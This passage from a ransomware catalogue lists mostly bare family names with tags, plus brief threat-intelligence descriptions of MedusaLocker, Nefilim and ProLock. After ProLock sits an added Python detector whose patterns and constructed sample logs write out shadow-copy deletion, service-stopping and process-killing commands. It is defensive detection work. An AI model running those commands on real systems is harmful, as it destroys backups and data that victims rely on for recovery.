The tag is: misp-galaxy:ransomware="Golden Axe"

Gomme

ransomware

The tag is: misp-galaxy:ransomware="Gomme"

GonnaCry Ransmware

ransomware

The tag is: misp-galaxy:ransomware="GonnaCry Ransmware"

Goofed HT

ransomware

The tag is: misp-galaxy:ransomware="Goofed HT"

GoRansom POC

ransomware

The tag is: misp-galaxy:ransomware="GoRansom POC"

Gorgon

ransomware

The tag is: misp-galaxy:ransomware="Gorgon"

Gotcha

ransomware

The tag is: misp-galaxy:ransomware="Gotcha"

GottaCry

ransomware

The tag is: misp-galaxy:ransomware="GottaCry"

GPAA

ransomware

The tag is: misp-galaxy:ransomware="GPAA"

GPGQwerty

ransomware

The tag is: misp-galaxy:ransomware="GPGQwerty"

Craftul

ransomware

The tag is: misp-galaxy:ransomware="Craftul"

Greystars

ransomware

The tag is: misp-galaxy:ransomware="Greystars"

GrodexCrypt

ransomware

The tag is: misp-galaxy:ransomware="GrodexCrypt"

GrujaRSorium

ransomware

The tag is: misp-galaxy:ransomware="GrujaRSorium"

Gruxer

ransomware

The tag is: misp-galaxy:ransomware="Gruxer"

GusCrypter

ransomware

The tag is: misp-galaxy:ransomware="GusCrypter"

GX40

ransomware

The tag is: misp-galaxy:ransomware="GX40"

H34rtBl33d

ransomware

The tag is: misp-galaxy:ransomware="H34rtBl33d"

HackdoorCrypt3r

ransomware

The tag is: misp-galaxy:ransomware="HackdoorCrypt3r"

Hades

ransomware

The tag is: misp-galaxy:ransomware="Hades"

Hades has relationships with:

  • similar: misp-galaxy:ransomware="WildFire Locker" with estimative-language:likelihood-probability="likely"

Hakbit

ransomware

The tag is: misp-galaxy:ransomware="Hakbit"

HappyCrypter

ransomware

The tag is: misp-galaxy:ransomware="HappyCrypter"

Haze

ransomware

The tag is: misp-galaxy:ransomware="Haze"

HCrypto

ransomware

The tag is: misp-galaxy:ransomware="HCrypto"

HELP@AUSI

ransomware

The tag is: misp-galaxy:ransomware="HELP@AUSI"

HelpDCFile

ransomware

The tag is: misp-galaxy:ransomware="HelpDCFile"

HelpMe

ransomware

The tag is: misp-galaxy:ransomware="HelpMe"

Hermes837

ransomware

The tag is: misp-galaxy:ransomware="Hermes837"

HermesVirus HT

ransomware

The tag is: misp-galaxy:ransomware="HermesVirus HT"

Heropoint

ransomware

The tag is: misp-galaxy:ransomware="Heropoint"

HiddenBeer

ransomware

The tag is: misp-galaxy:ransomware="HiddenBeer"

Honor

ransomware

The tag is: misp-galaxy:ransomware="Honor"

Horros

ransomware

The tag is: misp-galaxy:ransomware="Horros"

Hydra

ransomware

The tag is: misp-galaxy:ransomware="Hydra"

Hydra has relationships with:

  • similar: misp-galaxy:ransomware="Bianlian" with estimative-language:likelihood-probability="likely"

IGotYou

ransomware

The tag is: misp-galaxy:ransomware="IGotYou"

iGZa4C

ransomware

The tag is: misp-galaxy:ransomware="iGZa4C"

ILElection2020

ransomware

The tag is: misp-galaxy:ransomware="ILElection2020"

Ims00ry

ransomware

The tag is: misp-galaxy:ransomware="Ims00ry"

ImSorry

ransomware

The tag is: misp-galaxy:ransomware="ImSorry"

Incanto

ransomware

The tag is: misp-galaxy:ransomware="Incanto"

Indrik

ransomware

The tag is: misp-galaxy:ransomware="Indrik"

InducVirus

ransomware

The tag is: misp-galaxy:ransomware="InducVirus"

InfinityLock

ransomware

The tag is: misp-galaxy:ransomware="InfinityLock"

InfoDot

ransomware

The tag is: misp-galaxy:ransomware="InfoDot"

INPIVX

ransomware

The tag is: misp-galaxy:ransomware="INPIVX"

InsaneCrypt

ransomware

The tag is: misp-galaxy:ransomware="InsaneCrypt"

IPA

ransomware

The tag is: misp-galaxy:ransomware="IPA"

IT.Books

ransomware

The tag is: misp-galaxy:ransomware="IT.Books"

J-

ransomware

The tag is: misp-galaxy:ransomware="J-"

JabaCrypter

ransomware

The tag is: misp-galaxy:ransomware="JabaCrypter"

Jaffe

ransomware

The tag is: misp-galaxy:ransomware="Jaffe"

James

ransomware

The tag is: misp-galaxy:ransomware="James"

Java NotDharma

ransomware

The tag is: misp-galaxy:ransomware="Java NotDharma"

jCandy

ransomware

The tag is: misp-galaxy:ransomware="jCandy"

JeepersCrypt

ransomware

The tag is: misp-galaxy:ransomware="JeepersCrypt"

Jemd

ransomware

The tag is: misp-galaxy:ransomware="Jemd"

JesusCrypt

ransomware

The tag is: misp-galaxy:ransomware="JesusCrypt"

JNEC.a

ransomware

The tag is: misp-galaxy:ransomware="JNEC.a"

JoeGo

ransomware

The tag is: misp-galaxy:ransomware="JoeGo"

Jolly Roger

ransomware

The tag is: misp-galaxy:ransomware="Jolly Roger"

JosepCrypt

ransomware

The tag is: misp-galaxy:ransomware="JosepCrypt"

Juwon

ransomware

The tag is: misp-galaxy:ransomware="Juwon"

Kali

ransomware

The tag is: misp-galaxy:ransomware="Kali"

Kamil

ransomware

The tag is: misp-galaxy:ransomware="Kamil"

Kampret

ransomware

The tag is: misp-galaxy:ransomware="Kampret"

Karo

ransomware

The tag is: misp-galaxy:ransomware="Karo"

Katafrank

ransomware

The tag is: misp-galaxy:ransomware="Katafrank"

Katyusha

ransomware

The tag is: misp-galaxy:ransomware="Katyusha"

KCTF Locker

ransomware

The tag is: misp-galaxy:ransomware="KCTF Locker"

KCW

ransomware

The tag is: misp-galaxy:ransomware="KCW"

Kee

ransomware

The tag is: misp-galaxy:ransomware="Kee"

KEKW

ransomware

The tag is: misp-galaxy:ransomware="KEKW"

Kerkoporta

ransomware

The tag is: misp-galaxy:ransomware="Kerkoporta"

KeyMaker

ransomware

The tag is: misp-galaxy:ransomware="KeyMaker"

KillBot_Virus

ransomware

The tag is: misp-galaxy:ransomware="KillBot_Virus"

KillDisk-Dimens

ransomware

The tag is: misp-galaxy:ransomware="KillDisk-Dimens"

KillRabbit

ransomware

The tag is: misp-galaxy:ransomware="KillRabbit"

KillSwitch

ransomware

The tag is: misp-galaxy:ransomware="KillSwitch"

Kindest

ransomware

The tag is: misp-galaxy:ransomware="Kindest"

KKK

ransomware

The tag is: misp-galaxy:ransomware="KKK"

Kovter

ransomware

The tag is: misp-galaxy:ransomware="Kovter"

Kriptovor

ransomware

The tag is: misp-galaxy:ransomware="Kriptovor"

Krypte

ransomware

The tag is: misp-galaxy:ransomware="Krypte"

Krypton

ransomware

The tag is: misp-galaxy:ransomware="Krypton"

Kryptonite RBY

ransomware

The tag is: misp-galaxy:ransomware="Kryptonite RBY"

Kryptonite Snake

ransomware

The tag is: misp-galaxy:ransomware="Kryptonite Snake"

Kupidon

ransomware

The tag is: misp-galaxy:ransomware="Kupidon"

Ladon

ransomware

The tag is: misp-galaxy:ransomware="Ladon"

Lalabitch_ransomware

ransomware

The tag is: misp-galaxy:ransomware="Lalabitch_ransomware"

LazagneCrypt

ransomware

The tag is: misp-galaxy:ransomware="LazagneCrypt"

Light

ransomware

The tag is: misp-galaxy:ransomware="Light"

LightningCrypt

ransomware

The tag is: misp-galaxy:ransomware="LightningCrypt"

LIGMA

ransomware

The tag is: misp-galaxy:ransomware="LIGMA"

Lime

ransomware

The tag is: misp-galaxy:ransomware="Lime"

Litra

ransomware

The tag is: misp-galaxy:ransomware="Litra"

LittleFinger

ransomware

The tag is: misp-galaxy:ransomware="LittleFinger"

LMAOxUS

ransomware

The tag is: misp-galaxy:ransomware="LMAOxUS"

LockBox

ransomware

The tag is: misp-galaxy:ransomware="LockBox"

Locked_File

ransomware

The tag is: misp-galaxy:ransomware="Locked_File"

LockedByte

ransomware

The tag is: misp-galaxy:ransomware="LockedByte"

Locker-Pay

ransomware

The tag is: misp-galaxy:ransomware="Locker-Pay"

Lockify

ransomware

The tag is: misp-galaxy:ransomware="Lockify"

LockMe

ransomware

The tag is: misp-galaxy:ransomware="LockMe"

LockOn

ransomware

The tag is: misp-galaxy:ransomware="LockOn"

Lockout

ransomware

The tag is: misp-galaxy:ransomware="Lockout"

LongTermMemoryLoss

ransomware

The tag is: misp-galaxy:ransomware="LongTermMemoryLoss"

LonleyCrypt

ransomware

The tag is: misp-galaxy:ransomware="LonleyCrypt"

LooCipher

ransomware

The tag is: misp-galaxy:ransomware="LooCipher"

LordOfShadow

ransomware

The tag is: misp-galaxy:ransomware="LordOfShadow"

Losers

ransomware

The tag is: misp-galaxy:ransomware="Losers"

Losers-Dangerous

ransomware

The tag is: misp-galaxy:ransomware="Losers-Dangerous"

Lost_Files

ransomware

The tag is: misp-galaxy:ransomware="Lost_Files"

LuckyJoe

ransomware

The tag is: misp-galaxy:ransomware="LuckyJoe"

Luxnut

ransomware

The tag is: misp-galaxy:ransomware="Luxnut"

Madafakah

ransomware

The tag is: misp-galaxy:ransomware="Madafakah"

MadBit

ransomware

The tag is: misp-galaxy:ransomware="MadBit"

Magician

ransomware

The tag is: misp-galaxy:ransomware="Magician"

Malabu

ransomware

The tag is: misp-galaxy:ransomware="Malabu"

MalwareTech’s CTF

ransomware

The tag is: misp-galaxy:ransomware="MalwareTech’s CTF"

Mancros+AI4939

ransomware

The tag is: misp-galaxy:ransomware="Mancros+AI4939"

Maoloa

ransomware

The tag is: misp-galaxy:ransomware="Maoloa"

Marozka

ransomware

The tag is: misp-galaxy:ransomware="Marozka"

MarraCrypt

ransomware

The tag is: misp-galaxy:ransomware="MarraCrypt"

Matroska

ransomware

The tag is: misp-galaxy:ransomware="Matroska"

MauriGo

ransomware

The tag is: misp-galaxy:ransomware="MauriGo"

MaxiCrypt

ransomware

The tag is: misp-galaxy:ransomware="MaxiCrypt"

Maykolin

ransomware

The tag is: misp-galaxy:ransomware="Maykolin"

Maysomware

ransomware

The tag is: misp-galaxy:ransomware="Maysomware"

MBR-ONI

ransomware

The tag is: misp-galaxy:ransomware="MBR-ONI"

MedusaLocker

Observed as recently as May 2022, MedusaLocker actors predominantly rely on vulnerabilities in Remote Desktop Protocol (RDP) to access victims’ networks. The MedusaLocker actors encrypt the victim’s data and leave a ransom note with communication instructions in every folder containing an encrypted file. The note directs victims to provide ransomware payments to a specific Bitcoin wallet address. MedusaLocker appears to operate as a Ransomware-as-a-Service (RaaS) model based on the observed split of ransom payments. Typical RaaS models involve the ransomware developer and various affiliates that deploy the ransomware on victim systems. MedusaLocker ransomware payments appear to be consistently split between the affiliate, who receives 55 to 60 percent of the ransom, and the developer, who receives the remainder.

The tag is: misp-galaxy:ransomware="MedusaLocker"

Table 8584. Table References

Links

https://www.cisa.gov/uscert/ncas/alerts/aa22-181a

https://www.cisa.gov/uscert/sites/default/files/publications/AA22-181A_stopransomware_medusalocker.pdf

Meduza

ransomware

The tag is: misp-galaxy:ransomware="Meduza"

MegaLocker

ransomware

The tag is: misp-galaxy:ransomware="MegaLocker"

Mew767

ransomware

The tag is: misp-galaxy:ransomware="Mew767"

Mike NotSTOP

ransomware

The tag is: misp-galaxy:ransomware="Mike NotSTOP"

Mikoyan

ransomware

The tag is: misp-galaxy:ransomware="Mikoyan"

MindLost

ransomware

The tag is: misp-galaxy:ransomware="MindLost"

MindSystem

ransomware

The tag is: misp-galaxy:ransomware="MindSystem"

Mini

ransomware

The tag is: misp-galaxy:ransomware="Mini"

Minotaur

ransomware

The tag is: misp-galaxy:ransomware="Minotaur"

MMM

ransomware

The tag is: misp-galaxy:ransomware="MMM"

MNS CryptoLocker

ransomware

The tag is: misp-galaxy:ransomware="MNS CryptoLocker"

MoneroPay

ransomware

The tag is: misp-galaxy:ransomware="MoneroPay"

MongoLock

ransomware

The tag is: misp-galaxy:ransomware="MongoLock"

MoonCryptor

ransomware

The tag is: misp-galaxy:ransomware="MoonCryptor"

Mordor

ransomware

The tag is: misp-galaxy:ransomware="Mordor"

MorrisBatchCrypt

ransomware

The tag is: misp-galaxy:ransomware="MorrisBatchCrypt"

Moth

ransomware

The tag is: misp-galaxy:ransomware="Moth"

MoWare H.F.D

ransomware

The tag is: misp-galaxy:ransomware="MoWare H.F.D"

Mr.Locker

ransomware

The tag is: misp-galaxy:ransomware="Mr.Locker"

Mr403Forbidden

ransomware

The tag is: misp-galaxy:ransomware="Mr403Forbidden"

MuchLove

ransomware

The tag is: misp-galaxy:ransomware="MuchLove"

Muhstik

ransomware

The tag is: misp-galaxy:ransomware="Muhstik"

Mystic

ransomware

The tag is: misp-galaxy:ransomware="Mystic"

MZP

ransomware

The tag is: misp-galaxy:ransomware="MZP"

N2019cov

ransomware

The tag is: misp-galaxy:ransomware="N2019cov"

Naampa

ransomware

The tag is: misp-galaxy:ransomware="Naampa"

NazCrypt

ransomware

The tag is: misp-galaxy:ransomware="NazCrypt"

Nefilim

According to Vitali Kremez and Michael Gillespie, this ransomware shares much code with Nemty 2.5. One difference is the removal of the RaaS component, which was replaced by email communication for payments. Uses AES-128, which is then protected with RSA-2048.

The tag is: misp-galaxy:ransomware="Nefilim"

Nefilim has relationships with:

  • related-to: misp-galaxy:ransomware="Nemty" with estimative-language:likelihood-probability="likely"

Negozl

ransomware

The tag is: misp-galaxy:ransomware="Negozl"

Neitrino

ransomware

The tag is: misp-galaxy:ransomware="Neitrino"

NewWave

ransomware

The tag is: misp-galaxy:ransomware="NewWave"

NextCry

ransomware

The tag is: misp-galaxy:ransomware="NextCry"

Nightmare

ransomware

The tag is: misp-galaxy:ransomware="Nightmare"

NinjaLoc

ransomware

The tag is: misp-galaxy:ransomware="NinjaLoc"

NM4

ransomware

The tag is: misp-galaxy:ransomware="NM4"

Noblis

ransomware

The tag is: misp-galaxy:ransomware="Noblis"

Nog4yH4n

ransomware

The tag is: misp-galaxy:ransomware="Nog4yH4n"

Nomikon

ransomware

The tag is: misp-galaxy:ransomware="Nomikon"

NotAHero

ransomware

The tag is: misp-galaxy:ransomware="NotAHero"

Nozelesn

ransomware

The tag is: misp-galaxy:ransomware="Nozelesn"

Nulltica

ransomware

The tag is: misp-galaxy:ransomware="Nulltica"

Nx / OSR

ransomware

The tag is: misp-galaxy:ransomware="Nx / OSR"

Nyton

ransomware

The tag is: misp-galaxy:ransomware="Nyton"

NZMR

ransomware

The tag is: misp-galaxy:ransomware="NZMR"

Ogre

ransomware

The tag is: misp-galaxy:ransomware="Ogre"

OhNo!

ransomware

The tag is: misp-galaxy:ransomware="OhNo!"

Oled

ransomware

The tag is: misp-galaxy:ransomware="Oled"

OmniSphere

ransomware

The tag is: misp-galaxy:ransomware="OmniSphere"

One

ransomware

The tag is: misp-galaxy:ransomware="One"

ONI

ransomware

The tag is: misp-galaxy:ransomware="ONI"

OoPS Ramenware

ransomware

The tag is: misp-galaxy:ransomware="OoPS Ramenware"

OopsLocker

ransomware

The tag is: misp-galaxy:ransomware="OopsLocker"

OPdailyallowance

ransomware

The tag is: misp-galaxy:ransomware="OPdailyallowance"

OpenToYou

ransomware

The tag is: misp-galaxy:ransomware="OpenToYou"

Ordinal

ransomware

The tag is: misp-galaxy:ransomware="Ordinal"

Ordinypt

ransomware

The tag is: misp-galaxy:ransomware="Ordinypt"

Pacman

ransomware

The tag is: misp-galaxy:ransomware="Pacman"

PassLock

ransomware

The tag is: misp-galaxy:ransomware="PassLock"

Pay-or-Lost

ransomware

The tag is: misp-galaxy:ransomware="Pay-or-Lost"

PayForNature

ransomware

The tag is: misp-galaxy:ransomware="PayForNature"

Paymen45

ransomware

The tag is: misp-galaxy:ransomware="Paymen45"

Payment

ransomware

The tag is: misp-galaxy:ransomware="Payment"

PClock и PClock2

ransomware

The tag is: misp-galaxy:ransomware="PClock и PClock2"

PPDDDP

ransomware

The tag is: misp-galaxy:ransomware="PPDDDP"

PEC 2017

ransomware

The tag is: misp-galaxy:ransomware="PEC 2017"

Pendor

ransomware

The tag is: misp-galaxy:ransomware="Pendor"

Pennywise

ransomware

The tag is: misp-galaxy:ransomware="Pennywise"

PewCrypt +decrypt

ransomware

The tag is: misp-galaxy:ransomware="PewCrypt +decrypt"

PewDiePie

ransomware

The tag is: misp-galaxy:ransomware="PewDiePie"

PhobosImposter

ransomware

The tag is: misp-galaxy:ransomware="PhobosImposter"

PhoneNumber

ransomware

The tag is: misp-galaxy:ransomware="PhoneNumber"

PHP

ransomware

The tag is: misp-galaxy:ransomware="PHP"

Pirateware

ransomware

The tag is: misp-galaxy:ransomware="Pirateware"

PoisonFang

ransomware

The tag is: misp-galaxy:ransomware="PoisonFang"

PonyFinal

ransomware

The tag is: misp-galaxy:ransomware="PonyFinal"

PooleZoor

ransomware

The tag is: misp-galaxy:ransomware="PooleZoor"

PopCornTime

ransomware

The tag is: misp-galaxy:ransomware="PopCornTime"

PowerHentai

ransomware

The tag is: misp-galaxy:ransomware="PowerHentai"

PowerLocky

ransomware

The tag is: misp-galaxy:ransomware="PowerLocky"

PowerShell Locker 2013

ransomware

The tag is: misp-galaxy:ransomware="PowerShell Locker 2013"

PowerShell Locker 2015

ransomware

The tag is: misp-galaxy:ransomware="PowerShell Locker 2015"

Pr0tector

ransomware

The tag is: misp-galaxy:ransomware="Pr0tector"

Predator

ransomware

The tag is: misp-galaxy:ransomware="Predator"

Priapos

ransomware

The tag is: misp-galaxy:ransomware="Priapos"

Project23

ransomware

The tag is: misp-galaxy:ransomware="Project23"

Project57

ransomware

The tag is: misp-galaxy:ransomware="Project57"

ProLock

PwndLocker (the name under which ProLock was first tracked) is a ransomware that was observed in late 2019 and is reported to have been used to target businesses and local governments/cities. According to one source, ransom amounts demanded as part of PwndLocker activity range from $175k USD to $650k USD depending on the size of the network. PwndLocker attempts to disable a variety of Windows services so that the data they hold open can be encrypted. Various processes are also targeted, such as web browsers and software related to security, backups, and databases. Shadow copies are cleared by the ransomware, and encryption of files occurs once the system has been prepared in this way. Executable files and those that are likely to be important for the system to continue to function appear to be skipped by the ransomware, and a large number of folders, mostly related to Microsoft Windows system files, are also ignored. As of March 2020, encrypted files have been observed with the added extensions .key and .pwnd. Ransom notes are dropped in folders where encrypted files are found and also on the user’s desktop.

The tag is: misp-galaxy:ransomware="ProLock"

ProLock has relationships with:

  • dropped-by: misp-galaxy:botnet="Qbot" with estimative-language:likelihood-probability="likely"
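The preparation sequence described for ProLock/PwndLocker (services stopped, backup/database/security processes killed, shadow copies cleared, files renamed with .key or .pwnd) is a detection opportunity in its own right, because each step is visible in endpoint telemetry before any file is encrypted. The following is an added example, not code from the page, from MISP or from any vendor. The log records are constructed for the example, and the concrete commands it matches (vssadmin, wmic, net stop, sc stop, taskkill) are an assumption about how those actions typically appear in process-creation logs; the page describes the behaviour, not the commands.

```python
"""Flag ProLock/PwndLocker-style pre-encryption preparation in endpoint telemetry.

Added example, not code from the page, MISP or any vendor. Events are constructed;
the matched command lines are an assumption about how the described behaviours
(service stop, process kill, shadow copy deletion, .key/.pwnd renames) show up
in process-creation and file telemetry.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Behaviour patterns, matched case-insensitively against the command line.
BEHAVIOURS = {
    "shadow_copy_deletion": re.compile(
        r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete", re.I),
    "service_stop": re.compile(r"\b(net1?(\.exe)?\s+stop|sc(\.exe)?\s+stop)\b", re.I),
    "process_kill": re.compile(
        r"taskkill(\.exe)?\s+.*/im\s+\S*(sql|backup|veeam|exchange|msmpeng|chrome|firefox)", re.I),
}
# Extensions the page reports on encrypted files (as of March 2020).
RANSOM_EXT = re.compile(r"\.(key|pwnd)$", re.I)

WINDOW = timedelta(minutes=10)
MIN_BEHAVIOURS = 2   # distinct preparation steps inside WINDOW needed to alert


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%S")


def classify(event):
    """Return the set of behaviour labels a single event exhibits."""
    labels = set()
    cmd = event.get("cmdline", "")
    for name, rx in BEHAVIOURS.items():
        if rx.search(cmd):
            labels.add(name)
    if event.get("kind") == "file_rename" and RANSOM_EXT.search(event.get("target", "")):
        labels.add("ransom_extension_rename")
    return labels


def detect(events, window=WINDOW, min_behaviours=MIN_BEHAVIOURS):
    """Per host, slide a time window over labelled events and alert once
    at least min_behaviours distinct behaviours fall inside one window.
    A lone 'net stop' from an administrator never trips it on its own.
    Returns {host: sorted behaviour names} for the first qualifying window."""
    per_host = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):   # ISO timestamps sort lexically
        labels = classify(e)
        if labels:
            per_host[e["host"]].append((parse_ts(e["ts"]), labels))
    alerts = {}
    for host, hits in per_host.items():
        for i, (t0, _) in enumerate(hits):
            seen = set()
            for t, labels in hits[i:]:
                if t - t0 > window:
                    break
                seen |= labels
            if len(seen) >= min_behaviours:
                alerts[host] = sorted(seen)
                break
    return alerts


# Constructed telemetry, not real logs: ws-01 shows the full chain, ws-02 a
# single benign service stop, ws-03 two steps hours apart.
SAMPLE_EVENTS = [
    {"host": "ws-01", "ts": "2020-03-10T09:00:05", "kind": "process",
     "cmdline": "net stop MSSQLSERVER /y"},
    {"host": "ws-01", "ts": "2020-03-10T09:00:07", "kind": "process",
     "cmdline": "taskkill /F /IM sqlservr.exe"},
    {"host": "ws-01", "ts": "2020-03-10T09:00:30", "kind": "process",
     "cmdline": "vssadmin.exe Delete Shadows /All /Quiet"},
    {"host": "ws-01", "ts": "2020-03-10T09:01:10", "kind": "file_rename",
     "target": "C:\\Users\\a\\Documents\\q4.xlsx.pwnd"},
    {"host": "ws-02", "ts": "2020-03-10T11:15:00", "kind": "process",
     "cmdline": "sc stop Spooler"},
    {"host": "ws-03", "ts": "2020-03-10T08:00:00", "kind": "process",
     "cmdline": "net stop wuauserv"},
    {"host": "ws-03", "ts": "2020-03-10T13:00:00", "kind": "process",
     "cmdline": "vssadmin delete shadows /all"},
]

if __name__ == "__main__":
    for host, behaviours in detect(SAMPLE_EVENTS).items():
        print(host, behaviours)
```

Only ws-01 alerts on the constructed data: ws-02 exhibits one behaviour and ws-03 two behaviours five hours apart, which the ten-minute window is meant to keep apart from an operator stopping a service or clearing old shadow copies during maintenance. Widen the window and ws-03 alerts too, so the window and threshold are the tuning knobs to calibrate against an environment's own administrative noise.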

Prometey

ransomware

The tag is: misp-galaxy:ransomware="Prometey"

Protected

ransomware

The tag is: misp-galaxy:ransomware="Protected"

PSCrypt

ransomware

The tag is: misp-galaxy:ransomware="PSCrypt"

PshCrypt

ransomware

The tag is: misp-galaxy:ransomware="PshCrypt"

PTP

ransomware

The tag is: misp-galaxy:ransomware="PTP"

Pulpy

ransomware

The tag is: misp-galaxy:ransomware="Pulpy"

PureLocker

ransomware

The tag is: misp-galaxy:ransomware="PureLocker"

PwndLocker

ransomware

The tag is: misp-galaxy:ransomware="PwndLocker"

PyteHole

ransomware

The tag is: misp-galaxy:ransomware="PyteHole"

Python

ransomware

The tag is: misp-galaxy:ransomware="Python"

PZDC

ransomware

The tag is: misp-galaxy:ransomware="PZDC"

Qinynore

ransomware

The tag is: misp-galaxy:ransomware="Qinynore"

QNAPCrypt

ransomware

The tag is: misp-galaxy:ransomware="QNAPCrypt"

QP

ransomware

The tag is: misp-galaxy:ransomware="QP"

QuakeWay

ransomware

The tag is: misp-galaxy:ransomware="QuakeWay"

Qweuirtksd

ransomware

The tag is: misp-galaxy:ransomware="Qweuirtksd"

R3store

ransomware

The tag is: misp-galaxy:ransomware="R3store"

RabbitFox

ransomware

The tag is: misp-galaxy:ransomware="RabbitFox"

Ramsey

ransomware

The tag is: misp-galaxy:ransomware="Ramsey"

RandomLocker

ransomware

The tag is: misp-galaxy:ransomware="RandomLocker"

RanRans

ransomware

The tag is: misp-galaxy:ransomware="RanRans"

Rans0mLocked

ransomware

The tag is: misp-galaxy:ransomware="Rans0mLocked"

Ransed

ransomware

The tag is: misp-galaxy:ransomware="Ransed"

Ransom102

ransomware

The tag is: misp-galaxy:ransomware="Ransom102"

RansomAES

ransomware

The tag is: misp-galaxy:ransomware="RansomAES"

RansomCuck

ransomware

The tag is: misp-galaxy:ransomware="RansomCuck"

RansomMine

ransomware

The tag is: misp-galaxy:ransomware="RansomMine"

Ransomnix

ransomware

The tag is: misp-galaxy:ransomware="Ransomnix"

Ransom Prank

ransomware

The tag is: misp-galaxy:ransomware="Ransom Prank"

RansomUserLocker

ransomware

The tag is: misp-galaxy:ransomware="RansomUserLocker"

RansomWarrior

ransomware

The tag is: misp-galaxy:ransomware="RansomWarrior"

Rapid

ransomware

The tag is: misp-galaxy:ransomware="Rapid"

Rapid 2.0

ransomware

The tag is: misp-galaxy:ransomware="Rapid 2.0"

Rapid 3.0

ransomware

The tag is: misp-galaxy:ransomware="Rapid 3.0"

Rapid-Gillette

ransomware

The tag is: misp-galaxy:ransomware="Rapid-Gillette"

Ra

ransomware

The tag is: misp-galaxy:ransomware="Ra"

RaRuCrypt

ransomware

The tag is: misp-galaxy:ransomware="RaRuCrypt"

RedBoot

ransomware

The tag is: misp-galaxy:ransomware="RedBoot"

Redkeeper

ransomware

The tag is: misp-galaxy:ransomware="Redkeeper"

RedFox

ransomware

The tag is: misp-galaxy:ransomware="RedFox"

RedRum

ransomware

The tag is: misp-galaxy:ransomware="RedRum"

Redshot

ransomware

The tag is: misp-galaxy:ransomware="Redshot"

Reetner

ransomware

The tag is: misp-galaxy:ransomware="Reetner"

RekenSom

ransomware

The tag is: misp-galaxy:ransomware="RekenSom"

Relock

ransomware

The tag is: misp-galaxy:ransomware="Relock"

RensenWare

ransomware

The tag is: misp-galaxy:ransomware="RensenWare"

Rentyr

ransomware

The tag is: misp-galaxy:ransomware="Rentyr"

RestoLocker

ransomware

The tag is: misp-galaxy:ransomware="RestoLocker"

Resurrection

ransomware

The tag is: misp-galaxy:ransomware="Resurrection"

Retis

ransomware

The tag is: misp-galaxy:ransomware="Retis"

RetMyData

ransomware

The tag is: misp-galaxy:ransomware="RetMyData"

Revolution

ransomware

The tag is: misp-galaxy:ransomware="Revolution"

Reyptson

ransomware

The tag is: misp-galaxy:ransomware="Reyptson"

Rhino

ransomware

The tag is: misp-galaxy:ransomware="Rhino"

Rijndael

ransomware

The tag is: misp-galaxy:ransomware="Rijndael"

Rogue HT

ransomware

The tag is: misp-galaxy:ransomware="Rogue HT"

Rontok

ransomware

The tag is: misp-galaxy:ransomware="Rontok"

Rozlok

ransomware

The tag is: misp-galaxy:ransomware="Rozlok"

RSA-NI

ransomware

The tag is: misp-galaxy:ransomware="RSA-NI"

RSA2048Pro

ransomware

The tag is: misp-galaxy:ransomware="RSA2048Pro"

Ruby

ransomware

The tag is: misp-galaxy:ransomware="Ruby"

Rush

ransomware

The tag is: misp-galaxy:ransomware="Rush"

Russenger

ransomware

The tag is: misp-galaxy:ransomware="Russenger"

Russian EDA2

ransomware

The tag is: misp-galaxy:ransomware="Russian EDA2"

SAD

ransomware

The tag is: misp-galaxy:ransomware="SAD"

SadComputer

ransomware

The tag is: misp-galaxy:ransomware="SadComputer"

Sadogo

ransomware

The tag is: misp-galaxy:ransomware="Sadogo"

Salsa

ransomware

The tag is: misp-galaxy:ransomware="Salsa"

Santa Encryptor

ransomware

The tag is: misp-galaxy:ransomware="Santa Encryptor"

Saramat

ransomware

The tag is: misp-galaxy:ransomware="Saramat"

SARansom

ransomware

The tag is: misp-galaxy:ransomware="SARansom"

Satan Cryptor 2.0

ransomware

The tag is: misp-galaxy:ransomware="Satan Cryptor 2.0"

Satan’s Doom Crypter

ransomware

The tag is: misp-galaxy:ransomware="Satan’s Doom Crypter"

SatanCryptor Go

ransomware

The tag is: misp-galaxy:ransomware="SatanCryptor Go"

Saturn

ransomware

The tag is: misp-galaxy:ransomware="Saturn"

Satyr

ransomware

The tag is: misp-galaxy:ransomware="Satyr"

SaveTheQueen

ransomware

The tag is: misp-galaxy:ransomware="SaveTheQueen"

ScammerLocker HT

ransomware

The tag is: misp-galaxy:ransomware="ScammerLocker HT"

ScammerLocker Ph

ransomware

The tag is: misp-galaxy:ransomware="ScammerLocker Ph"

Schwerer

ransomware

The tag is: misp-galaxy:ransomware="Schwerer"

ScorpionLocker

ransomware

The tag is: misp-galaxy:ransomware="ScorpionLocker"

Scrabber

ransomware

The tag is: misp-galaxy:ransomware="Scrabber"

Scroboscope

ransomware

The tag is: misp-galaxy:ransomware="Scroboscope"

SecretSystem

ransomware

The tag is: misp-galaxy:ransomware="SecretSystem"

SecureCryptor

ransomware

The tag is: misp-galaxy:ransomware="SecureCryptor"

SeginChile

ransomware

The tag is: misp-galaxy:ransomware="SeginChile"

SEND.ID.TO

ransomware

The tag is: misp-galaxy:ransomware="SEND.ID.TO"

Seon

ransomware

The tag is: misp-galaxy:ransomware="Seon"

Sepsis

ransomware

The tag is: misp-galaxy:ransomware="Sepsis"

SepSys

ransomware

The tag is: misp-galaxy:ransomware="SepSys"

Shadi

ransomware

The tag is: misp-galaxy:ransomware="Shadi"

ShadowCryptor

ransomware

The tag is: misp-galaxy:ransomware="ShadowCryptor"

ShinigamiLocker

ransomware

The tag is: misp-galaxy:ransomware="ShinigamiLocker"

ShkolotaCrypt

ransomware

The tag is: misp-galaxy:ransomware="ShkolotaCrypt"

Shrug

ransomware

The tag is: misp-galaxy:ransomware="Shrug"

Shutdown57

ransomware

The tag is: misp-galaxy:ransomware="Shutdown57"

ShutUpAndDance

ransomware

The tag is: misp-galaxy:ransomware="ShutUpAndDance"

Sifreli 2017

ransomware

The tag is: misp-galaxy:ransomware="Sifreli 2017"

Sifreli 2019

ransomware

The tag is: misp-galaxy:ransomware="Sifreli 2019"

SifreCozucu

ransomware

The tag is: misp-galaxy:ransomware="SifreCozucu"

SilentSpring

ransomware

The tag is: misp-galaxy:ransomware="SilentSpring"

SintaLocker

ransomware

The tag is: misp-galaxy:ransomware="SintaLocker"

Skull

ransomware

The tag is: misp-galaxy:ransomware="Skull"

Skull HT

ransomware

The tag is: misp-galaxy:ransomware="Skull HT"

SkyStars

ransomware

The tag is: misp-galaxy:ransomware="SkyStars"

SlankCryptor

ransomware

The tag is: misp-galaxy:ransomware="SlankCryptor"

Snake-Ekans

ransomware

